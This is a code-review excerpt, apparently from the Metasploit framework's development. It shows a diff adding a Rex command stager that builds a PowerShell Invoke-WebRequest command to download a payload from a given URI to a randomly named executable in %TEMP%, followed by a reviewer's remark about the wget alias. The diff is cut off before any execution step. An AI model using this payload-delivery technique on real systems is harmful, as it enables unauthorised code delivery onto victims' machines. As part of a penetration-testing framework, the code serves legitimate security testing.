lib/rex/exploitation/cmdstager/invokewebrequest.rb

```diff
@@ -0,0 +1,46 @@
+# -*- coding: binary -*-
+
+class Rex::Exploitation::CmdStagerInvokeWebRequest < Rex::Exploitation::CmdStagerBase
+
+  def http?
+    true
+  end
+
+  def user_agent
+    /WindowsPowerShell/
+  end
+
+  def generate(opts = {})
+    if opts[:payload_uri].nil?
+      raise "#{self.class.name}##{__callee__} missing opts[:payload_uri]"
+    end
+
+    opts[:temp] ||= '%TEMP%'
+    opts[:file] ||= "#{Rex::Text.rand_text_alpha(8)}.exe"
+    @payload_path = "#{opts[:temp]}\\#{opts[:file]}"
+
+    super
+  end
+
+  def generate_cmds_payload(opts)
+    # NOTE: This requires PowerShell >= 3.0
+    cmd = "Invoke-WebRequest -OutFile #{@payload_path} #{opts[:payload_uri]}"
```

Comment:
When invoked as `wget -O`, the invocation is identical to GNU Wget, which is pretty funny.